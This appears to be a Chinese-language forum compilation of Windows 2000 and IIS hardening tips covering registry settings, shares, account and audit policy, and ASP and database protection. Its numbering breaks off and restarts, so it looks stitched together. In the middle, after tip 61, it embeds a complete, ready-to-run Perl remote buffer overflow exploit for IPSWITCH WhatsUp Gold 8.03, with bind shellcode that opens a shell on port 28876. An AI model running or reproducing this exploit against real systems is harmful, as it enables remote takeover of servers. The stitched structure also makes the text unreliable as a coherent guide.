47.在注册表HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters中更改以下值可以帮助你防御一定强度的DoS攻击 SynAttackProtect REG_DWORD 2
EnablePMTUDiscovery REG_DWORD 0 NoNameReleaseOnDemand REG_DWORD 1
EnableDeadGWDetect REG_DWORD 0 KeepAliveTime REG_DWORD 300,000
PerFORMRouterDiscovery REG_DWORD 0 EnableICMPRedirects REG_DWORD 0
48.打开本地安全策略,选择IP安全策略,在这里我们可以定义自己的IP安全策略。一个IP安全过滤器由两个部分组成:过滤策略和过滤操作,过滤策略决定哪些报文应当引起过滤器的关注,过滤操作决定过滤器是“允许”还是“拒绝”报文的通过。要新建IP安全过滤器,必须新建自己的过滤策略和过滤操作:右击本机的IP安全策略,选择管理IP过滤器,在IP过滤器管理列表中建立一个新的过滤规则:ICMP_ANY_IN,源地址选任意IP,目标地址选本机,协议类型是ICMP,切换到管理过滤器操作,增加一个名为Deny的操作,操作类型为"阻止"(Block)。这样我们就有了一个关注所有进入ICMP报文的过滤策略和丢弃所有报文的过滤操作了。需要注意的是,在地址选项中有一个镜像选择,如果选中镜像,那么将会建立一个对称的过滤策略,也就是说当你关注any IP->my IP的时候,由于镜像的作用,实际上你也同时关注了my IP->any IP,你可以根据自己的需要选择或者放弃镜像。再次右击本机的IP安全策略,选择新建IP过滤策略,建立一个名称为ICMP Filter的过滤器,通过增加过滤规则向导,我们把刚刚定义的ICMP_ANY_IN过滤策略指定给ICMP Filter,然后在操作选框中选择我们刚刚定义的Deny操作,退出向导窗口,右击ICMP Filter并启用它,现在任何地址进入的ICMP报文都会被丢弃了。
虽然用IP sec能够对ICMP报文进行过滤,不过操作起来太麻烦,而且如果你只需要过滤特定的ICMP报文,还要保留一些常用报文(如主机不可达、网络不可达等),IP sec策略就力不从心了,我们可以利用Win2000的另一个强大工具路由与远程访问控制(Routing & Remote Access)来完成这些复杂的过滤操作。
路由与远程访问控制是Win2000用来管理路由表、配置VPN、控制远程访问、进行IP报文过滤的工具,默认情况下并没有安装,所以首先你需要启用它,打开"管理工具"->"路由与远程访问",右击服务器(如果没有则需要添加本机)选择"配置并启用路由及远程访问",这时配置向导会让你选择是什么样的服务器,一般来说,如果你不需要配置VPN服务器,那么选择"手动配置"就可以了,配置完成后,主机下将出现一个IP路由的选项,在"常规"中选择你想配置的网卡(如果你有多块网卡,你可以选择关闭某一块的ICMP),在网卡属性中点击"输入筛选器",添加一条过滤策略"from:ANY to:ANY 协议:ICMP 类型:8 :编码 丢弃"就可以了(类型8编码0就是Ping使用的ICMP_ECHO报文,如果要过滤所有的ICMP报文只需要将类型和编码都设置为255)
49.改变windows系统的一些默认值(例如:数据包的生存时间(TTL)值,不同系统有不同的值,有经验的人可以根据TTL的不同的值判断对方使用的是何种操作系统(例如windows 2000默认值128)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)
说明:指定传出IP数据包中设置的默认生存时间(TTL)值.TTL决定了IP数据包在到达
目标前在网络中生存的最大时间.它实际上限定了IP数据包在丢弃前允许通过的路由
器数量.有时利用此数值来探测远程主机操作系统.
50.防止ICMP重定向报文的攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
EnableICMPRedirects REG_DWORD 0x0(默认值为0x1)
说明:该参数控制Windows 2000是否会改变其路由表以响应网络设备(如路由器)发送给它的ICMP重定向消息,有时会被利用来干坏事.Win2000中默认值为1,表示响应ICMP重定向报文.
51.禁止响应ICMP路由通告报文
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\interface
PerformRouterDiscovery REG_DWORD 0x0(默认值为0x2)
说明:“ICMP路由公告”功能可造成他人计算机的网络连接异常,数据被窃听,计算机被用于流量攻击等严重后果.此问题曾导致校园网某些局域网大面积,长时间的网络异常.因此建议关闭响应ICMP路由通告报文.Win2000中默认值为2,表示当DHCP发送路由器发现选项时启用
52.防止SYN洪水攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SynAttackProtect REG_DWORD 0x2(默认值为0x0)
说明:SYN攻击保护包括减少SYN-ACK重新传输次数,以减少分配资源所保留的时
间.路由缓存项资源分配延迟,直到建立连接为止.如果synattackprotect=2,
则AFD的连接指示一直延迟到三路握手完成为止.注意,仅在TcpMaxHalfOpen和
TcpMaxHalfOpenRetried设置超出范围时,保护机制才会采取措施.
53.禁止C$、D$一类的缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareServer、REG_DWORD、0x0
54.禁止ADMIN$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareWks、REG_DWORD、0x0
10.限制IPC$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
restrictanonymous REG_DWORD 0x0 缺省
0x1 匿名用户无法列举本机用户列表
0x2 匿名用户无法连接本机IPC$共享
说明:不建议使用2,否则可能会造成你的一些服务无法启动,如SQL Server
55.不支持IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
IGMPLevel REG_DWORD 0x0(默认值为0x2)
说明:记得Win9x下有个bug,就是用可以用IGMP使别人蓝屏,修改注册表可以修正这个
bug.Win2000虽然没这个bug了,但IGMP并不是必要的,因此照样可以去掉.改成0后用
route print将看不到那个讨厌的224.0.0.0项了.
56.设置arp缓存老化时间设置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
ArpCacheLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为120秒)
ArpCacheMinReferencedLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为600)
说明:如果ArpCacheLife大于或等于ArpCacheMinReferencedLife,则引用或未引用的ARP缓存项在ArpCacheLife秒后到期.如果ArpCacheLife小于阿ARPCacheMinReferencedLife,未引用项在ArpCacheLife秒后到期,而引用项在ArpCacheMinReferencedLife秒后到期.每次将出站数据包发送到项的IP地址时,就会引用ARP缓存中的项。
57.禁止死网关监测技术
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
EnableDeadGWDetect REG_DWORD 0x0(默认值为ox1)
说明:如果你设置了多个网关,那么你的机器在处理多个连接有困难时,就会自动改用备份网关.有时候这并不是一项好主意,建议禁止死网关监测.
58.不支持路由功能
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
IPEnableRouter REG_DWORD 0x0(默认值为0x0)
说明:把值设置为0x1可以使Win2000具备路由功能,由此带来不必要的问题.
59.做NAT时放大转换的对外端口最大值
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
MaxUserPort REG_DWORD 5000-65534(十进制)(默认值0x1388--十进制为5000)
说明:当应用程序从系统请求可用的用户端口数时,该参数控制所使用的最大端口数.正常情况下,短期端口的分配数量为1024-5000.将该参数设置到有效范围以外时,就会使用最接近的有效数值(5000或65534).使用NAT时建议把值放大点.
60.修改MAC地址
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\
找到右窗口的说明为"网卡"的目录,
比如说是{4D36E972-E325-11CE-BFC1-08002BE10318}
展开之,在其下的0000,0001,0002...的分支中找到"DriverDesc"的键值为你网卡的说明,比如说"DriverDesc"的值为"Intel? 82559 Fast Ethernet LAN on Motherboard"然后在右窗口新建一字符串值,名字为"Networkaddress",内容为你想要的MAC值,比如说是"004040404040"然后重启动计算机,ipconfig /all看看.
61.防止密码被DUMP,你只需在服务里面关掉Remote regisitery servicess
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
看看吧!希望你能有收获
IPSWITCH WhatsUp Gold 8.03 Remote Buffer Overflow exploit
Code: [Copy to clipboard]
#!/usr/bin/perl
# [LoWNOISE] NotmuchG.pl v.1.5
# ================================================
# IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit
# ================================================
#
# Exploit by ET LoWNOISE Colombia
# et(at)cyberspace.org
# Oct/2004
#
# Tested on WIN2K SP4
#
# The exploit takes control by overwriting the pointer of a Structured Exception Handler,
# installed by WhatsUP and points to a routine that handles exceptions.
# (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny Cyberpunk THC)
#
# The overflow string has to be around 4080 in length to generate an exception that can
# be manipulated by changing the SEH pointer (ret [815]).
#
#
# Bug Discovered by
# iDEFENSE Security Advisory 08.25.04
# http://www.idefense.com/application/poi/display?type=vulnerabilities
#
# Greetz to the midget, the m3 and los parces , the seltiks, p0ch1n,Ritt3r,Mav, f4lc0n..
use strict;
use IO::Socket::INET;
usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# Bind shellcode port 28876 (HDM, metasploit.org)
my $shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52".
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1".
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a".
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01".
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b".
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32".
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff".
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe".
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff".
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89".
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff".
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a".
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb".
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0".
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44".
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b".
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff".
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff".
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0".
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";
$socket->autoflush(1);
print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword, application/x-shockwave-flash,
application/vnd.citrix.AdvGWClient-2_2, */*\r\n";
print $socket "Referer:
http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n";
print $socket "Accept-Language: en-us\r\nContent-Type:
application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n";
print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; T312461; .NET CLR 1.1.4322)\r\n";
print $socket "Host: 127.0.0.1\r\nContent-Length: ";
my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";
#[-------815-------------] [ret] [-------------4080---------]
#[A.....811...A][jmp] [ret] [nops][shc][E.......E ]
$cmd .= "A"x811; #815 -4
$cmd .= "\xeb\x06\x90\x90"; #jumper <eb + 06> <garbage> jmp to shellcode
#$cmd .= "\xfe\x63\xa1\x71"; #winXP SP1 ws2help.dll
$cmd .= "\xc4\x2a\x02\x75"; #win2k sp0-sp4 ws2help.dll
#$cmd .= "LOWNOISE"; #garbage :D
$cmd .= "\x90"x2080;
$cmd .= $shellcode;
$cmd .= "E"x(2000-length($shellcode)); #mas basura
$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic
YWRtaW46YWRtaW4=\r\n\r\n";
print $socket $cmd."\r\n";
close($socket);
exit(0);
sub usage
{
print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n";
print "===================================================\n";
print "\nUsage: NotmuchG.pl [host] [port]\n";
print "[host] Target host\n[port] WhatsUp webserver port\n\n";
print "\n Shell on tcp port 28876.\n\n";
print "ET LoWNOISE 2004\n";
exit(1);
}
2.建议最好一次性全部安装成NTFS分区,而不要先安装成FAT分区再转化为NTFS分区,这样做在安装了SP5和SP6的情况下会导致转化不成功,甚至系统崩溃。
3.安装NTFS分区有一个潜在的危险,就是目前大多数反病毒软件没有提供对软盘启动后NTFS分区病毒的查杀,这样一旦系统中了恶性病毒而导致系统不能正常启动,后果就比较严重,因此及建议平时做好防病毒工作。
4.分区和逻辑盘的分配
推荐的安全配置是建立三个逻辑驱动器,第一个大于2G,用来装系统和重要的日志文件,第二个放IIS,第三个放FTP,这样无论IIS或FTP出了安全漏洞都不会直接影响到系统目录和系统文件。要知道,IIS和FTP是对外服务的,比较容易出问题。而把IIS和FTP分开主要是为了防止入侵者上传程序并从IIS中运行。
5.安装顺序的选择:
win2000在安装中有几个顺序是一定要注意的: 首先,何时接入网络:Win2000在安装时有一个漏洞,在你输入Administrator密码后,系统就建立了ADMIN$的共享,但是并没有用你刚刚输入的密码来保护它,这种情况一直持续到你再次启动后,在此期间,任何人都可以通过ADMIN$进入你的机器;同时,只要安装一完成,各种服务就会自动运行,而这时的服务器是满身漏洞,非常容易进入的,因此,在完全安装并配置好win2000 SERVER之前,一定不要把主机接入网络。 其次,补丁的安装:补丁的安装应该在所有应用程序安装完之后,因为补丁程序往往要替换/修改某些系统文件,如果先安装补丁再安装应用程序有可能导致补丁不能起到应有的效果,例如:IIS的HotFix就要求每次更改IIS的配置都需要安装
6.端口是计算机和外部网络相连的逻辑接口,也是计算机的第一道屏障,端口配置正确与否直接影响到主机的安全,一般来说,仅打开你需要使用的端口会比较安全,配置的方法是在网卡属性-TCP/IP-高级-选项-TCP/IP筛选中启用TCP/IP筛选,不过对于win2000的端口过滤来说,有一个不好的特性:只能规定开哪些端口,不能规定关闭哪些端口,这样对于需要开大量端口的用户就比较痛苦。
7.IIS是微软的组件中漏洞最多的一个,平均两三个月就要出一个漏洞,而微软的IIS默认安装又实在不敢恭维,所以IIS的配置是我们的重点,现在大家跟着我一起来:首先,把C盘那个什么Inetpub目录彻底删掉,在D盘建一个Inetpub(要是你不放心用默认目录名也可以改一个名字,但是自己要记得)在IIS管理器中将主目录指向D:\Inetpub;其次,那个IIS安装时默认的什么scripts等虚拟目录一概删除,如果你需要什么权限的目录可以自己慢慢建,需要什么权限开什么。(特别注意写权限和执行程序的权限,没有绝对的必要千万不要给)第三,应用程序配置:在IIS管理器中删除必须之外的任何无用映射,必须指的是ASP,ASA和其他你确实需要用到的文件类型,例如你用到stml等(使用server side include),实际上90%的主机有了上面两个映射就够了,其余的映射几乎每个都有一个凄惨的故事:htw, htr, idq, ida……想知道这些故事?去查以前的漏洞列表吧。在IIS管理器中右击主机->属性->WWW服务 编辑->主目录配置->应用程序映射,然后就开始一个个删吧(里面没有全选的,嘿嘿)。接着在刚刚那个窗口的应用程序调试书签内将脚本错误消息改为发送文本(除非你想ASP出错的时候用户知道你的程序/网络/数据库结构)错误文本写什么?随便你喜欢,自己看着办。点击确定退出时别忘了让虚拟站点继承你设定的属性。安装新的Service Pack后,IIS的应用程序映射应重新设置。(说明:安装新的Service Pack后,某些应用程序映射又会出现,导致出现安全漏洞。这是管理员较易忽视的一点。)
为了对付日益增多的cgi漏洞扫描器,还有一个小技巧可以参考,在IIS中将HTTP404 Object Not Found出错页面通过URL重定向到一个定制HTM文件,可以让目前绝大多数CGI漏洞扫描器失灵。其实原因很简单,大多数CGI扫描器在编写时为了方便,都是通过查看返回页面的HTTP代码来判断漏洞是否存在的,例如,著名的IDQ漏洞一般都是通过取1.idq来检验,如果返回HTTP200,就认为是有这个漏洞,反之如果返回HTTP404就认为没有,如果你通过URL将HTTP404出错信息重定向到HTTP404.htm文件,那么所有的扫描无论存不存在漏洞都会返回HTTP200,90%的CGI扫描器会认为你什么漏洞都有,结果反而掩盖了你真正的漏洞,让入侵者茫然无处下手,不过从个人角度来说,我还是认为扎扎实实做好安全设置比这样的小技巧重要的多。
最后,为了保险起见,你可以使用IIS的备份功能,将刚刚的设定全部备份下来,这样就可以随时恢复IIS的安全配置。还有,如果你怕IIS负荷过高导致服务器满负荷死机,也可以在性能中打开CPU限制,例如将IIS的最大CPU使用率限制在70%。
8.帐号尽可能少,且尽可能少用来登录;
说明:网站帐号一般只用来做系统维护,多余的帐号一个也不要,因为多一个帐号就会多一份被攻破的危险。
除过Administrator外,有必要再增加一个属于管理员组的帐号;
说明:两个管理员组的帐号,一方面防止管理员一旦忘记一个帐号的口令还
有一个备用帐号;另方面,一旦黑客攻破一个帐号并更改口令,我们还有有机会重新在短期内取得控制权。
所有帐号权限需严格控制,轻易不要给帐号以特殊权限;
将Administrator重命名,改为一个不易猜的名字。其他一般帐号也应尊循这一原则。
说明:这样可以为黑客攻击增加一层障碍。
将Guest帐号禁用,同时重命名为一个复杂的名字,增加口令,并将它从
Guest组删掉;
说明:有的黑客工具正是利用了guest 的弱点,可以将帐号从一般用户提
升到管理员组。
给所有用户帐号一个复杂的口令(系统帐号出外),长度最少在8位以上, 且必须同时包含字母、数字、特殊字符。同时不要使用大家熟悉的单词(如microsoft)、熟悉的键盘顺序(如qwert)、熟悉的数字(如2000)等。
说明:口令是黑客攻击的重点,口令一旦被突破也就无任何系统安全可言了,而这往往是不少网管所忽视的地方,据我们的测试,仅字母加数字的5位口令在几分钟内就会被攻破,而所推荐的方案则要安全的多。
口令必须定期更改(建议至少两周该一次),且最好记在心里,除此以外不要在任何地方做记录;另外,如果在日志审核中发现某个帐号被连续尝试,则必须立刻更改此帐号(包括用户名和口令);
在帐号属性中设立锁定次数,比如改帐号失败登录次数超过5次即锁定改帐号。这样可以防止某些大规模的登录尝试,同时也使管理员对该帐号提高警惕。
9.Win2000的默认安装是不开任何安全审核的!
你到本地安全策略->审核策略中打开相应的审核,推荐的审核是:
账户管理 成功 失败
登录事件 成功 失败
对象访问 失败
策略更改 成功 失败
特权使用 失败
系统事件 成功 失败
目录服务访问 失败
账户登录事件 成功 失败
审核项目少的缺点是万一你想看发现没有记录那就一点都没辙;审核项目太多不仅会占用系统资源而且会导致你根本没空去看,这样就失去了审核的意义。 与之相关的是:
在账户策略->密码策略中设定:
密码复杂性要求 启用
密码长度最小值 6位
强制密码历史 5次
最长存留期 30天
在账户策略->账户锁定策略中设定:
账户锁定 3次错误登录
锁定时间 20分钟
复位锁定计数 20分钟
同样,Terminal Service的安全日志默认也是不开的,我们可以在Terminal Service Configration(远程服务配置)-权限-高级中配置安全审核,一般来说只要记录登录、注销事件就可以了。
10.为了控制好服务器上用户的权限,同时也为了预防以后可能的入侵和溢出,NT的访问权限分为:读取、写入、读取及执行、修改、列目录、完全控制。在默认的情况下,大多数的文件夹对所有用户(Everyone这个组)是完全敞开的(Full Control),你需要根据应用的需要进行权限重设。
在进行权限控制时,请记住以下几个原则:
1>限是累计的:如果一个用户同时属于两个组,那么他就有了这两个组所允许的所有权限;
2>拒绝的权限要比允许的权限高(拒绝策略会先执行)如果一个用户属于一个被拒绝访问某个资源的组,那么不管其他的权限设置给他开放了多少权限,他也一定不能访问这个资源。所以请非常小心地使用拒绝,任何一个不当的拒绝都有可能造成系统无法正常运行;
3>文件权限比文件夹权限高
4>利用用户组来进行权限控制是一个成熟的系统管理员必须具有的优良习惯之一;
5>仅给用户真正需要的权限,权限的最小化原则是安全的重要保障;
11.只安装一种操作系统;
说明:安装两种以上操作系统,会给黑客以可乘之机,利用攻击使系统重启到另外一个没有安全设置的操作系统(或者他熟悉的操作系统),进而进行破坏。
12.安装成独立的域控制器(Stand Alone),选择工作组成员,不选择域;
说明:主域控制器(PDC)是局域网中队多台联网机器管理的一种方式,用于网站服务器包含着安全隐患,使黑客有可能利用域方式的漏洞攻击站点服务器。
13.将操作系统文件所在分区与WEB数据包括其他应用程序所在的分区分开,并在安装时最好不要使用系统默认的目录,如将\WINNT改为其他目录;
说明:黑客有可能通过WEB站点的漏洞得到操作系统对操作系统某些程序的执行权限,从而造成更大的破坏。同时如果采用IIS的话你应该在其设置中删除掉所有的无用的映射,同时不要安装索引服务,远程站点管理与服务器扩展最好也不要要,然后删掉默认路径下的www,整个删,不要手软,然后再硬盘的另一个硬盘建立存放你网站的文件夹,同时一定记得打开w3c日志纪录,切记(不过本人建议采用apache 1.3.24)
系统安装过程中一定本着最小服务原则,无用的服务一概不选择,达到系统的最小安装,多一个服务,多一份风险,呵呵,所以无用组件千万不要安装!
14.关于补丁:在NT下,如果安装了补丁程序,以后如果要从NT光盘上安装新的Windows程序,都要重新安装一次补丁程序, 2000下不需要这样做。
说明:
最新的补丁程序,表示系统以前有重大漏洞,非补不可了,对于局域网内服务器可以不是最新的,但站点必须安装最新补丁,否则黑客可能会利用低版本补丁的漏洞对系统造成威胁。这是一部分管理员较易忽视的一点;
安装NT的SP5、SP6有一个潜在威胁,就是一旦系统崩溃重装NT时,系统将不会认NTFS分区,原因是微软在这两个补丁中对NTFS做了改进。只能通过Windows 2000安装过程中认NTFS,这样会造成很多麻烦,建议同时做好数据备份工作。
安装Service Pack前应先在测试机器上安装一次,以防因为例外原因导致机器死机,同时做好数据备份。
尽量不安装与WEB站点服务无关的软件;
说明:其他应用软件有可能存在黑客熟知的安全漏洞。
15.解除NetBios与TCP/IP协议的绑定
说明:NetBois在局域网内是不可缺少的功能,在网站服务器上却成了黑客扫描工具的首选目标。方法:NT:控制面版——网络——绑定——NetBios接口——禁用 2000:控制面版——网络和拨号连接——本地网络——属性——TCP/IP——属性——高级——WINS——禁用TCP/IP上的NETBIOS
16.删除所有的网络共享资源,在网络连接的设置中删除文件和打印共享,只留下TCP/IP协议
说明:2000在默认情况下有不少网络共享资源,在局域网内对网络管理和网络通讯有用,在网站服务器上同样是一个特大的安全隐患。(卸载“Microsoft 网络的文件和打印机共享”。当查看“网络和拨号连接”中的任何连接属性时,将显示该选项。单击“卸载”按钮删除该组件;清除“Microsoft 网络的文件和打印机共享”复选框将不起作用。)
方法:
1>2000:控制面版——管理工具——计算及管理——共享文件夹———停止共享
但上述方法太麻烦,服务器每重启一次,管理员就必须停止一次
2>修改注册表:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters下增加一个键
Name: AutoShareServer
Type: REG_DWORD
value: 0
然后重新启动您的服务器,磁盘分区共享去掉,但IPC共享仍存在,需每次重启后手工删除。
17.改NTFS的安全权限;
说明:NTFS下所有文件默认情况下对所有人(EveryOne)为完全控制权限,这使黑客有可能使用一般用户身份对文件做增加、删除、执行等操作,建议对一般用户只给予读取权限,而只给管理员和System以完全控制权限,但这样做有可能使某些正常的脚本程序不能执行,或者某些需要写的操作不能完成,这时需要对这些文件所在的文件夹权限进行更改,建议在做更改前先在测试机器上作测试,然后慎重更改。
18.加强数据备份;
说明:这一点非常重要,站点的核心是数据,数据一旦遭到破坏后果不堪设想,而这往往是黑客们真正关心的东西;遗憾的是,不少网管在这一点上作的并不好,不是备份不完全,就是备份不及时。数据备份需要仔细计划,制定出一个策略并作了测试以后才实施,而且随着网站的更新,备份计划也需要不断地调整。
19.只保留TCP/IP协议,删除NETBEUI、IPX/SPX协议;
说明:网站需要的通讯协议只有TCP/IP,而NETBEUI是一个只能用于局域网的协议,IPX/SPX是面临淘汰的协议,放在网站上没有任何用处,反而会被某些黑客工具利用。
20.不要起用IP转发功能,控制面板->网络->协议->TCP/IP协议->属性,使这个选框为空。(NT)
说明:缺省情况下,NT的IP转发功能是禁止的,但注意不要启用,否则它会具有路由作用,被黑客利用来对其他服务器进行攻击。
21.安装最新的MDAC(http://www.microsoft.com/data/download.htm)
说明:MDAC为数据访问部件,通常程序对数据库的访问都通过它,但它也是黑客攻击的目标,为防止以前版本的漏洞可能会被带入升级后的版本,建议卸载后安装最新的版本。注意:在安装最新版本前最好先做一下测试,因为有的数据访问方式或许在新版本中不再被支持,这种情况下可以通过修改注册表来档漏洞,祥见漏洞测试文档。
22.设置IP拒绝访问列表
说明:对于WWW服务,可以拒绝一些对站点有攻击嫌疑的地址;尤其对于FTP服务,如果只是自己公司上传文件,就可以只允许本公司的IP访问改FTP服务,这样,安全性大为提高。
23.禁止对FTP服务的匿名访问
说明:如果允许对FTP服务做匿名访问,该匿名帐户就有可能被利用来获取更多的信息,以致对系统造成危害。
24.建议使用W3C扩充日志文件格式,每天记录客户IP地址,用户名,服务器端口,方法,URI字根,HTTP状态,用户代理,而且每天均要审查日志。(最好不要使用缺省的目录,建议更换一个记日志的路径,同时设置日志的访问权限,只允许管理员和system为Full Control)
说明:作为一个重要措施,既可以发现攻击的迹象,采取预防措施,也可以作为受攻击的一个证据。
25.慎重设置WEB站点目录的访问权限,一般情况下,不要给予目录以写入和允许目录浏览权限。只给予.ASP文件目录以脚本的权限,而不要给与执行权限。
说明:目录访问权限必须慎重设置,否则会被黑客利用。
免。
26.涉及用户名与口令的程序最好封装在服务器端,尽量少的在ASP文件里出现,涉及到与数据库连接地用户名与口令应给予最小的权限。
说明:用户名与口令,往往是黑客们最感兴趣的东西,如果被通过某种方式看到源代码,后果是严重的。因此要尽量减少它们在ASP文件中的出现次数。出现次数多得用户名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及到与数据库连接,理想状态下只给它以执行存储过程的权限,千万不要直接给予该用户以修改、插入、删除记录的权限。
27.需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。
说明:现在的需要经过验证的ASP程序多是在页面头部加一个判断语句,但这还不够,有可能被黑客绕过验证直接进入,因此有必要跟踪上一个页面。具体漏洞见所附漏洞文档。
28.防止ASP主页.inc文件泄露问题
当存在asp 的主页正在制作并没有进行最后调试完成以前,可以被某些搜索引擎机动追加为搜索对象,如果这时候有人利用搜索引擎对这些网页进行查找,会得到有关文件的定位,并能在浏览器中察看到数据库地点和结构的细节揭示完整的源代码。
解决方案:应该在网页发布前对其进行彻底的调试;安全专家需要固定asp 包含文件以便外部的用户不能看他们。 首先对 .inc 文件内容进行加密,其次也可以使用 .asp 文件代替 .inc 文件使用户无法从浏览器直接观看文件的源代码。.inc 文件的文件名不用使用系统默认的或者有特殊含义容易被用户猜测到的,尽量使用无规则的英文字母。
29.注意某些ASP编辑器会自动备份asp文件,会被下载的漏洞
在有些编辑asp程序的工具,当创建或者修改一个asp文件时,编辑器自动创建一个备份文件,比如:UltraEdit就会备份一个..bak文件,如你创建或者修改了some.asp,编辑器自动生成一个叫some.asp.bak文件,如果你没有删除这个 bak文件,攻击有可以直接下载some.asp.bak文件,这样some.asp的源程序就会给下载。
在处理类似留言板、BBS等输入框的ASP程序中,最好屏蔽掉HTML、j avascript、VBScript语句,如无特殊要求,可以限定只允许输入字母与数字,屏蔽掉特殊字符。同时对输入字符的长度进行限制。而且不但在客户端进行输入合法性检查,同时要在服务器端程序中进行类似检查。
说明:输入框是黑客利用的一个目标,他们可以通过输入脚本语言等对用户客户端造成损坏; 如果该输入框涉及到数据查询,他们会利用特殊查询输入得到更多的数据库数据,甚至是表的全部。因此必须对输入框进行过滤。但如果为了提高效率仅在客户端进行输入合法性检查,仍有可能被绕过,因此必须在服务器端再做一次检查。
30.防止ACCESS mdb 数据库有可能被下载的漏洞
在用ACCESS做后台数据库时,如果有人通过各种方法知道或者猜到了服务器的ACCESS数据库的路径和数据库名称,那么他能够下载这个ACCESS数据库文件,这是非常危险的。
解决方法:
1>为你的数据库文件名称起个复杂的非常规的名字,并把他放在几目录下。所谓 "非常规", 打个比方: 比如有个数据库要保存的是有关书籍的信息, 可不要把他起个"book.mdb"的名字,起个怪怪的名称,比如d34ksfslf.mdb, 再把他放在如./kdslf/i44/studi/ 的几层目录下,这样黑客要想通过猜的方式得到你的ACCESS数据库文件就难上加难了。
2>不要把数据库名写在程序中。有些人喜欢把DSN写在程序中,比如:
DBPath = Server.MapPath("cmddb.mdb")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
假如万一给人拿到了源程序,你的ACCESS数据库的名字就一览无余。因此建议你在ODBC里设置数据源,再在程序中这样写:
conn.open "shujiyuan"
